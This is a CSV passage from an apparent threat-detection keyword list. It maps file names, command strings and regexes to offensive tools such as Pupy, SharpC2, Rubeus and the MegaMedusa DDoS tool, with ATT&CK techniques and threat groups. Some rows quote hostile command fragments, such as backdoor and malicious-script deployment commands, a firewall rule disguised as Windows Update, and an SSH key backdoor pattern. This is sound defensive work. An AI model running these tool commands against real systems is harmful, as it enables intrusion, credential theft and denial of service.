"*Collect security tokens from pipe server (\\\\.\\pipe\\catcher)*",".{0,1000}Collect\ssecurity\stokens\sfrom\spipe\sserver\s\(\\\\\\\\\.\\\\pipe\\\\catcher\).{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","38627"
"*Collecting Privesc methods*",".{0,1000}Collecting\sPrivesc\smethods.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","38628"
"*Collection/MiniDumpWriteDump.*",".{0,1000}Collection\/MiniDumpWriteDump\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","38629"
"*Collection_ArchiveCollectedData_ArchiveViaCustomMethod.py*",".{0,1000}Collection_ArchiveCollectedData_ArchiveViaCustomMethod\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","38630"
"*Collection_ArchiveCollectedData_ArchiveViaCustomMethod_7z.py*",".{0,1000}Collection_ArchiveCollectedData_ArchiveViaCustomMethod_7z\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","38631"
"*--collectionmethod DCOnly*",".{0,1000}\-\-collectionmethod\sDCOnly.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","38632"
"*ColorDataProxyUACBypass*",".{0,1000}ColorDataProxyUACBypass.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","38633"
"*COM Object hijacking persistence.ps1*",".{0,1000}COM\sObject\shijacking\spersistence\.ps1.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","0","N/A","N/A","8","1","58","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z","38634"
"*com.itgorillaz.lnk2pwn.model*",".{0,1000}com\.itgorillaz\.lnk2pwn\.model.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","38636"
"*com.rastamouse.*",".{0,1000}com\.rastamouse\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38638"
"*com/Anonym0usWork1221/Free-Proxies/main/proxy_files/http_proxies.txt*",".{0,1000}com\/Anonym0usWork1221\/Free\-Proxies\/main\/proxy_files\/http_proxies\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38639"
"*com/Anonym0usWork1221/Free-Proxies/main/proxy_files/https_proxies.txt*",".{0,1000}com\/Anonym0usWork1221\/Free\-Proxies\/main\/proxy_files\/https_proxies\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38640"
"*com/mmpx12/proxy-list/master/https.txt*",".{0,1000}com\/mmpx12\/proxy\-list\/master\/https\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38641"
"*com/monosans/proxy-list/main/proxies/http.txt*",".{0,1000}com\/monosans\/proxy\-list\/main\/proxies\/http\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38642"
"*com/MuRongPIG/Proxy-Master/main/http.txt*",".{0,1000}com\/MuRongPIG\/Proxy\-Master\/main\/http\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38643"
"*com/officialputuid/KangProxy/KangProxy/http/http.txt*",".{0,1000}com\/officialputuid\/KangProxy\/KangProxy\/http\/http\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38644"
"*com/opsxcq/proxy-list/master/list.txt*",".{0,1000}com\/opsxcq\/proxy\-list\/master\/list\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38645"
"*com/proxylist-to/proxy-list/main/http.txt*",".{0,1000}com\/proxylist\-to\/proxy\-list\/main\/http\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38646"
"*com/prxchk/proxy-list/main/http.txt*",".{0,1000}com\/prxchk\/proxy\-list\/main\/http\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38647"
"*com/roosterkid/openproxylist/main/HTTPS_RAW.txt*",".{0,1000}com\/roosterkid\/openproxylist\/main\/HTTPS_RAW\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38648"
"*com/ShiftyTR/Proxy-List/master/http.txt*",".{0,1000}com\/ShiftyTR\/Proxy\-List\/master\/http\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38649"
"*com/ShiftyTR/Proxy-List/master/https.txt*",".{0,1000}com\/ShiftyTR\/Proxy\-List\/master\/https\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38650"
"*com/TheSpeedX/PROXY-List/master/http.txt*",".{0,1000}com\/TheSpeedX\/PROXY\-List\/master\/http\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38651"
"*com/yuceltoluyag/GoodProxy/main/raw.txt*",".{0,1000}com\/yuceltoluyag\/GoodProxy\/main\/raw\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38652"
"*com_exec_go(*",".{0,1000}com_exec_go\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/vysecurity/ANGRYPUPPY","1","0","N/A","N/A","10","10","316","87","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z","38653"
"*combine_harvester-main*",".{0,1000}combine_harvester\-main.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","N/A","10","2","108","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z","38654"
"*com-exec.cna*",".{0,1000}com\-exec\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","N/A","10","10","316","87","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z","38655"
"*COMHunter* -inproc*",".{0,1000}COMHunter.{0,1000}\s\-inproc.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","38656"
"*COMHunter* -localserver*",".{0,1000}COMHunter.{0,1000}\s\-localserver.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","38657"
"*COMHunter.csproj*",".{0,1000}COMHunter\.csproj.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","38658"
"*COMHunter.exe*",".{0,1000}COMHunter\.exe.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","38659"
"*COMHunter.sln*",".{0,1000}COMHunter\.sln.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","38660"
"*COM-Hunter_v*.zip*",".{0,1000}COM\-Hunter_v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","38661"
"*COM-Hunter-main*",".{0,1000}COM\-Hunter\-main.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","38662"
"*COMInjectDotNet.exe*",".{0,1000}COMInjectDotNet\.exe.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","38663"
"*-Command ""New-NetFirewallRule -DisplayName 'Windows Update' -Direction Outbound -Action Allow*",".{0,1000}\-Command\s\""New\-NetFirewallRule\s\-DisplayName\s\'Windows\sUpdate\'\s\-Direction\sOutbound\s\-Action\sAllow.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","Socks proxy -  and reverse socks server using powershell.","T1090 - T1021.001 - T1021.002","TA0002","N/A","N/A","C2","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38664"
"*-Command ""--signature --driver""*",".{0,1000}\-Command\s\""\-\-signature\s\-\-driver\"".{0,1000}","offensive_tool_keyword","PowerSharpPack","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","38665"
"*-command *.exe* -technique ccmstp*",".{0,1000}\-command\s.{0,1000}\.exe.{0,1000}\s\-technique\sccmstp.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","38666"
"*--command assign-privilegedrole --token *",".{0,1000}\-\-command\sassign\-privilegedrole\s\-\-token\s.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","38668"
"*--command backdoor-script --id *",".{0,1000}\-\-command\sbackdoor\-script\s\-\-id\s.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","38669"
"*--command deploy-maliciousscript --script *",".{0,1000}\-\-command\sdeploy\-maliciousscript\s\-\-script\s.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","38670"
"*--command invoke-reconasoutsider --domain *",".{0,1000}\-\-command\sinvoke\-reconasoutsider\s\-\-domain\s.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","38671"
"*--command invoke-userenumerationasoutsider --username *",".{0,1000}\-\-command\sinvoke\-userenumerationasoutsider\s\-\-username\s.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","38672"
"*--command spoof-owaemailmessage *",".{0,1000}\-\-command\sspoof\-owaemailmessage\s.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","38673"
"*command_obfuscator.py*",".{0,1000}command_obfuscator\.py.{0,1000}","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","#linux","N/A","10","10","1752","185","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z","38675"
"*command=*###---POWERSHELL---*eval $(echo *",".{0,1000}command\=.{0,1000}\#\#\#\-\-\-POWERSHELL\-\-\-.{0,1000}eval\s\$\(echo\s.{0,1000}","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider* - FANCY BEAR","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","38676"
"*CommandAndControl_*.py*",".{0,1000}CommandAndControl_.{0,1000}\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","38677"
"*CommandCam.exe /devlist > *\CC.log*",".{0,1000}CommandCam\.exe\s\/devlist\s\>\s.{0,1000}\\CC\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","38678"
"*CommandCam.exe*",".{0,1000}CommandCam\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","38679"
"*commandovm.*.installer.fireeye*",".{0,1000}commandovm\..{0,1000}\.installer\.fireeye.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","38681"
"*commando-vm-master*",".{0,1000}commando\-vm\-master.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","38682"
"*Commands/Brute.*",".{0,1000}Commands\/Brute\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","38683"
"*Commands/Createnetonly.*",".{0,1000}Commands\/Createnetonly\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","38684"
"*Commands/DcomCommand.*",".{0,1000}Commands\/DcomCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38685"
"*Commands/DroneCommand.*",".{0,1000}Commands\/DroneCommand\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38686"
